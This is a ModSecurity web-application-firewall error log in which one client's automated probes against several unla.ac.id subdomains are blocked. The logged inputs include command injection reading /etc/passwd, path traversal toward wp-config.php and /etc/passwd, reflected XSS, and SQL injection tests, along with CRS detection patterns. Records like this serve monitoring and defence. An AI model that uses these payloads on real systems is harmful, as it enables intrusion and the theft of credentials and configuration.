"ZO14c8Co-f0AAAjav44AAAAV"]
[Tue Aug 29 11:47:47.798828 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAj119MAAAAa"]
[Tue Aug 29 11:47:48.354416 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAkdu3MAAAAO"]
[Tue Aug 29 11:47:48.390416 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAkBKoIAAAAb"]
[Tue Aug 29 11:47:48.395409 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAjdQQAAAAAZ"]
[Tue Aug 29 11:47:48.416287 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAkdu3QAAAAO"]
[Tue Aug 29 11:47:48.422961 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14dMCo-f0AAAkcgTAAAAAM"]
[Tue Aug 29 11:47:48.441394 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAjtc4QAAAAX"]
[Tue Aug 29 11:47:48.468051 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAkcgTIAAAAM"]
[Tue Aug 29 11:47:48.468071 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAjdQQMAAAAZ"]
[Tue Aug 29 11:47:48.487926 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAjrbJ8AAAAP"]
[Tue Aug 29 11:47:48.488754 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAjFof4AAAAF"]
[Tue Aug 29 11:47:49.382962 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/search"] [unique_id "ZO14dcCo-f0AAAjCbLIAAAAB"]
[Tue Aug 29 11:47:49.440478 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dcCo-f0AAAkcgTQAAAAM"]
[Tue Aug 29 11:47:49.456833 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search"] [unique_id "ZO14dcCo-f0AAAjtc4YAAAAX"]
[Tue Aug 29 11:47:49.457023 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAjrbKIAAAAP"]
[Tue Aug 29 11:47:49.493236 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAkBKocAAAAb"]
[Tue Aug 29 11:47:49.495386 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAkcgTUAAAAM"]
[Tue Aug 29 11:47:49.496139 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAjrbKMAAAAP"]
[Tue Aug 29 11:47:49.569044 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAkcgTYAAAAM"]
[Tue Aug 29 11:47:49.569320 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAjtc4gAAAAX"]
[Tue Aug 29 11:47:49.571527 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAkNPogAAAAI"]
[Tue Aug 29 11:47:49.572031 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAj1190AAAAa"]
[Tue Aug 29 11:47:49.585344 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAkAL80AAAAU"]
[Tue Aug 29 11:47:49.586990 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAkaC@oAAAAJ"]
[Tue Aug 29 11:47:50.356100 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkNPokAAAAI"]
[Tue Aug 29 11:47:50.359797 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkAL84AAAAU"]
[Tue Aug 29 11:47:50.360370 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjrbKUAAAAP"]
[Tue Aug 29 11:47:50.363286 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjL8W4AAAAR"]
[Tue Aug 29 11:47:50.393484 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjtc4oAAAAX"]
[Tue Aug 29 11:47:50.398760 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkAL88AAAAU"]
[Tue Aug 29 11:47:50.409253 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjbw28AAAAW"]
[Tue Aug 29 11:47:50.415277 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14dsCo-f0AAAj11@AAAAAa"]
